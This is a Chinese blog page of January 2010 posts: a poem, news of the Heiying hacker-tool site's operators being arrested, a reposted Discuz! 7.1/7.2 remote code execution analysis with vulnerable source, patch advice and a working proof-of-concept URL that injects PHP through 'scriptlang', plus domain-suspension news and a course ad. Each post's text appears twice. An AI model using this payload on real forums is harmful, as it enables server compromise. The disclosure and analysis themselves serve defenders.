Jan
9
寻找一米阴凉
栖息躁动不止的魂
透视这熙攘的街头,还有人群
寻找一米阳光
唤醒几近颓废的心
拥抱生活的美好,或者不美好
寻找一米阴凉
冷静不时冲昏的头
坦对平淡的现实,哪怕碌碌、乃至险阻重重
寻找一米阳光
晾晒隐着孤独的眼神
欣然依旧还在的诚挚,继续追求、哪怕憧憬
栖息躁动不止的魂
透视这熙攘的街头,还有人群
寻找一米阳光
唤醒几近颓废的心
拥抱生活的美好,或者不美好
寻找一米阴凉
冷静不时冲昏的头
坦对平淡的现实,哪怕碌碌、乃至险阻重重
寻找一米阳光
晾晒隐着孤独的眼神
欣然依旧还在的诚挚,继续追求、哪怕憧憬
Jan
7
黑鹰网站打不开 被关了 大米被抓了 小耗子木马
黑鹰的客服说是服务器问题,呵呵都一个多月了没消息,暂时开了个临时论坛 域名 客服的qq号
那临时论坛空间放在美国,大家都知道,国内没证的论坛都关,注册资金100w-盈利性网站(听说广告都不能挂,挂广告就是盈利)
咱们草根站长,呵呵--我有100w,我还忙死忙活的去做网站。额~~
重大的原因是关于小耗子木马吧, 大家都知道 小耗子木马上了cctv...呵呵
http://video.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=%D0%A1%BA%C4%D7%D3%C4%BE%C2%ED
很多相关的视频 是黑鹰的会员。。。。听说和黑鹰有关系 呵呵牵连了吧
黑鹰不低调,还在河南卫视上打广告 ,当然和河南政府部门有关系吧,现在出了问题,河南的不管了。。。呵呵
都怕cctv.记得cctv报光cn域名便宜 让很多人大批量注册,里面说18一个 不便宜呢, 过了2天 就下了命令个人不能注册cn域名
cn域名涨价.
呵呵,也希望黑鹰早日康复吧! 我的博客,www.rootkj.cn 新网不要关我玉米!
下面copy一个新浪的文章
2名男子出售黑客软件获利数百万被捕2010年01月07日11:44 汉网-武汉晚报
本报讯(记者 刘丰 通讯员 袁明 饶学兵 王萍 实习生 李学萍)两男子成立公司,专门提供“黑客”软件,吸收1万多名会员,并因此获利数百万元。昨悉,检察机关以涉嫌非法侵入计算机信息系统罪,依法对犯罪嫌疑人李强、张磊批准逮捕。
2006年3月,河南人李强和张磊联合成立了黑鹰科技有限公司,李强任公司董事长兼法人,张磊任公司总经理。二人以向会员提供“黑客”软件技术收取会费,获取非法利益。经侦查机关查明:二人自2007年至2009年10月,利用黑鹰科技公司“黑鹰安全网”提供“灰鸽子”、“小耗子下载者”等非法入侵、控制计算机信息系统程序工具软件供人下载使用,按照年收取200至996元不等数目的会费发展会员,共计发展会员1万余人,获取非法利益数百万元。并致使会员高某、韩某等人为了敲诈他人钱财,铤而走险,利用下载的上述工具攻击麻城市黄金桥开发区一网吧,造成40余家固定IP网络中断达60余小时。
麻城市检察院近日以涉嫌非法侵入计算机信息系统罪,对李强、张磊予以批捕。
黑鹰的客服说是服务器问题,呵呵都一个多月了没消息,暂时开了个临时论坛 域名 客服的qq号
那临时论坛空间放在美国,大家都知道,国内没证的论坛都关,注册资金100w-盈利性网站(听说广告都不能挂,挂广告就是盈利)
咱们草根站长,呵呵--我有100w,我还忙死忙活的去做网站。额~~
重大的原因是关于小耗子木马吧, 大家都知道 小耗子木马上了cctv...呵呵
http://video.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=%D0%A1%BA%C4%D7%D3%C4%BE%C2%ED
很多相关的视频 是黑鹰的会员。。。。听说和黑鹰有关系 呵呵牵连了吧
黑鹰不低调,还在河南卫视上打广告 ,当然和河南政府部门有关系吧,现在出了问题,河南的不管了。。。呵呵
都怕cctv.记得cctv报光cn域名便宜 让很多人大批量注册,里面说18一个 不便宜呢, 过了2天 就下了命令个人不能注册cn域名
cn域名涨价.
呵呵,也希望黑鹰早日康复吧! 我的博客,www.rootkj.cn 新网不要关我玉米!
下面copy一个新浪的文章
2名男子出售黑客软件获利数百万被捕2010年01月07日11:44 汉网-武汉晚报
本报讯(记者 刘丰 通讯员 袁明 饶学兵 王萍 实习生 李学萍)两男子成立公司,专门提供“黑客”软件,吸收1万多名会员,并因此获利数百万元。昨悉,检察机关以涉嫌非法侵入计算机信息系统罪,依法对犯罪嫌疑人李强、张磊批准逮捕。
2006年3月,河南人李强和张磊联合成立了黑鹰科技有限公司,李强任公司董事长兼法人,张磊任公司总经理。二人以向会员提供“黑客”软件技术收取会费,获取非法利益。经侦查机关查明:二人自2007年至2009年10月,利用黑鹰科技公司“黑鹰安全网”提供“灰鸽子”、“小耗子下载者”等非法入侵、控制计算机信息系统程序工具软件供人下载使用,按照年收取200至996元不等数目的会费发展会员,共计发展会员1万余人,获取非法利益数百万元。并致使会员高某、韩某等人为了敲诈他人钱财,铤而走险,利用下载的上述工具攻击麻城市黄金桥开发区一网吧,造成40余家固定IP网络中断达60余小时。
麻城市检察院近日以涉嫌非法侵入计算机信息系统罪,对李强、张磊予以批捕。
Jan
6
首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实发现的是同一个问题。截止夜里2点多种我下线,还只有t00ls核心群里几个人知道我给出的exp,可我怎么也想不到,经过半天时间,exp就满天飞了,而且确实出自昨天我的那个版本。
不难想象,exp流传的速度,A与B关系好,A发给B;B与C是好朋友,B发给C...总有人耐不住性子,泄露点风声,于是就人手一份。最受不了的是,竟然有些SB在群里拿来叫卖;实在不想说什么,要叫卖什么时候轮到你?人心不古,以后有的话还是自己藏着吧。
上午漏洞告诉了Saiy,DZ官方的补丁很快就出来了吧。
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。
漏洞介绍:
Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。
漏洞分析:
下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:
一、漏洞来自showmessage函数:
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危险的用法,未初始化的变量可以直接带进函数,直接导致了问题产生,from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
define('CACHE_FORBIDDEN', TRUE);
$hookscriptmessage = $show_message = $message;$messagehandle = 0;
$msgforward = unserialize($_DCACHE['settings']['msgforward']);
$refreshtime = intval($msgforward['refreshtime']);
$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
$msgforward['refreshtime'] = $refreshtime * 1000;
$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
$seccodecheck = $seccodestatus & 2;
if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
if($fp = @fopen($statlogfile, 'a')) {
@flock($fp, 2);
if(is_array($funcstatinfo)) {
$funcstatinfo = array_unique($funcstatinfo);
foreach($funcstatinfo as $funcinfo) {
fwrite($fp, funcstat_query($funcinfo, $message)."\n");
}
} else {
fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
}
fclose($fp);
$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
}
}
if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
}
if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
updatesession();
dheader("location: ".str_replace('&', '&', $url_forward));
}
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
}
$extra = '';
}
if(in_array($extra, array('HALTED', 'NOPERM'))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
}
include language('messages');
$vars = explode(':', $message);//只要含:就可以了
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化,可以自定义,from www.oldjun.com
} elseif(isset($language[$message])) {
$pre = $inajax ? 'ajax_' : '';
eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
unset($pre);
}
......
}
二、DZ的全局机制导致了未初始化的参数可以任意提交:
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}
三、misc.php正好有个可以自定义message的点,其实也是未初始化:
elseif($action == 'imme_binding' && $discuz_uid) {
if(isemail($id)) {
$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
$msn = explode("\t", $msn);
$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
$msn = "$msn[0]\t$id";
$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
showmessage('msn_binding_succeed', 'memcp.php');
} else {
if($result == 'Declined') {
dheader("Location: memcp.php");
} else {
showmessage($response['result']);//$response没有初始化,可以自定义,from www.oldjun.com
}
}
}
四、漏洞利用:
showmessage函数里$vars = explode(':', $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。
五、漏洞修复:
1.有补丁的打补丁;
2.没有补丁可以暂时先注释引起漏洞的语句,或者对两个变量赋个值。
poc:
(应Saiy的要求,不发exp了!)注册一个用户登陆,然后提交
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}
rn原文来自:http://bbs.rilone.com
不难想象,exp流传的速度,A与B关系好,A发给B;B与C是好朋友,B发给C...总有人耐不住性子,泄露点风声,于是就人手一份。最受不了的是,竟然有些SB在群里拿来叫卖;实在不想说什么,要叫卖什么时候轮到你?人心不古,以后有的话还是自己藏着吧。
上午漏洞告诉了Saiy,DZ官方的补丁很快就出来了吧。
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。
漏洞介绍:
Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。
漏洞分析:
下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:
一、漏洞来自showmessage函数:
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危险的用法,未初始化的变量可以直接带进函数,直接导致了问题产生,from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
define('CACHE_FORBIDDEN', TRUE);
$hookscriptmessage = $show_message = $message;$messagehandle = 0;
$msgforward = unserialize($_DCACHE['settings']['msgforward']);
$refreshtime = intval($msgforward['refreshtime']);
$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
$msgforward['refreshtime'] = $refreshtime * 1000;
$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
$seccodecheck = $seccodestatus & 2;
if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
if($fp = @fopen($statlogfile, 'a')) {
@flock($fp, 2);
if(is_array($funcstatinfo)) {
$funcstatinfo = array_unique($funcstatinfo);
foreach($funcstatinfo as $funcinfo) {
fwrite($fp, funcstat_query($funcinfo, $message)."\n");
}
} else {
fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
}
fclose($fp);
$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
}
}
if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
}
if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
updatesession();
dheader("location: ".str_replace('&', '&', $url_forward));
}
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
}
$extra = '';
}
if(in_array($extra, array('HALTED', 'NOPERM'))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
}
include language('messages');
$vars = explode(':', $message);//只要含:就可以了
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化,可以自定义,from www.oldjun.com
} elseif(isset($language[$message])) {
$pre = $inajax ? 'ajax_' : '';
eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
unset($pre);
}
......
}
二、DZ的全局机制导致了未初始化的参数可以任意提交:
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}
三、misc.php正好有个可以自定义message的点,其实也是未初始化:
elseif($action == 'imme_binding' && $discuz_uid) {
if(isemail($id)) {
$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
$msn = explode("\t", $msn);
$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
$msn = "$msn[0]\t$id";
$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
showmessage('msn_binding_succeed', 'memcp.php');
} else {
if($result == 'Declined') {
dheader("Location: memcp.php");
} else {
showmessage($response['result']);//$response没有初始化,可以自定义,from www.oldjun.com
}
}
}
四、漏洞利用:
showmessage函数里$vars = explode(':', $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。
五、漏洞修复:
1.有补丁的打补丁;
2.没有补丁可以暂时先注释引起漏洞的语句,或者对两个变量赋个值。
poc:
(应Saiy的要求,不发exp了!)注册一个用户登陆,然后提交
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}
rn原文来自:http://bbs.rilone.com
Jan
5
IT168为国内大型的IT资讯门户,今天下午其注册于新网的域名已经被禁止解析,状态为Client-Hold, IT168是中国指导IT产品采购的知名媒体品牌,是国内最大、最权威的导购资讯网站之一。自1999年创立以来,IT168以鲜明的定位、专业到位的服务,成为个人以及企业用户获取IT产品信息、导购资讯首选的网络媒体!
域名WHOIS信息如下:
Domain Name: IT168.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.IT168.COM
Name Server: NS2.IT168.COM
Status: clientHold
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 05-jan-2010
Creation Date: 25-may-1999
Expiration Date: 25-may-2013
具内部人士告诉了如下信息:
51.com
随后编辑拨打新网总部电话得知, 51.com因涉嫌非法信息被Hold ,只有等域名所有人提交申请解除hold。
关于51.com
51.com成立于2005年8月,是目前中国最大的社交网站,由著名互联网人士庞升东创建, 截至2009年6月底,51.com注册用户数超过1.6亿,月独立登陆用户数超过3850万,日均PV超过3亿。51.com是由美国红杉资本中国基金(Sequoia Capital China)、巨人网络集团(Giant Interactive Group)、海纳亚洲创投(Susquehanna International Group)、英特尔资本(Intel Capital)、红点创投(Redpoint Ventures)等国际著名的企业和风险基金联合投资而成。
域名WHOIS信息如下:
Domain Name: IT168.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.IT168.COM
Name Server: NS2.IT168.COM
Status: clientHold
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 05-jan-2010
Creation Date: 25-may-1999
Expiration Date: 25-may-2013
具内部人士告诉了如下信息:
51.com
随后编辑拨打新网总部电话得知, 51.com因涉嫌非法信息被Hold ,只有等域名所有人提交申请解除hold。
关于51.com
51.com成立于2005年8月,是目前中国最大的社交网站,由著名互联网人士庞升东创建, 截至2009年6月底,51.com注册用户数超过1.6亿,月独立登陆用户数超过3850万,日均PV超过3亿。51.com是由美国红杉资本中国基金(Sequoia Capital China)、巨人网络集团(Giant Interactive Group)、海纳亚洲创投(Susquehanna International Group)、英特尔资本(Intel Capital)、红点创投(Redpoint Ventures)等国际著名的企业和风险基金联合投资而成。
Jan
5
欢迎收看由Rilone和NB5 给您带来的全国首套无线安全审计培训系列课程
www.rilone.com www.nb5.cn
无线安全-作为最近几年的热门话题,家庭和企业用户更是他们离不开的热点.为此我站联合经验丰富
的无线安全专家作为技术后盾.制作了"全国首套"最新最全的"无线网安攻防教程"希望为广大的无线安
全爱好者提供更好﹑更全﹑更新的技术.在此开设了"2009-2010无线安防视频教程".网络安全是一个时
代,无线安全已经到来.你应该做出选择!
中心思想-本课程以实战为主,理论为辅.好多同学问到为什么要学理论,咱们干脆就演练下工具的使
用不就好了吗?其实这个问题回答有千千万万,但我想告诉大家,我们是为了学习更丰富更有技术性的学
术.正如在你学习外语的时期,老师不会让大家死记句子和单词,更要学会"举一反三".包括现在所有培训
学校和讲师也只能达到抛砖引玉作用.
下载地址
bbs.rilone.com
www.rilone.com www.nb5.cn
无线安全-作为最近几年的热门话题,家庭和企业用户更是他们离不开的热点.为此我站联合经验丰富
的无线安全专家作为技术后盾.制作了"全国首套"最新最全的"无线网安攻防教程"希望为广大的无线安
全爱好者提供更好﹑更全﹑更新的技术.在此开设了"2009-2010无线安防视频教程".网络安全是一个时
代,无线安全已经到来.你应该做出选择!
中心思想-本课程以实战为主,理论为辅.好多同学问到为什么要学理论,咱们干脆就演练下工具的使
用不就好了吗?其实这个问题回答有千千万万,但我想告诉大家,我们是为了学习更丰富更有技术性的学
术.正如在你学习外语的时期,老师不会让大家死记句子和单词,更要学会"举一反三".包括现在所有培训
学校和讲师也只能达到抛砖引玉作用.
下载地址
bbs.rilone.com
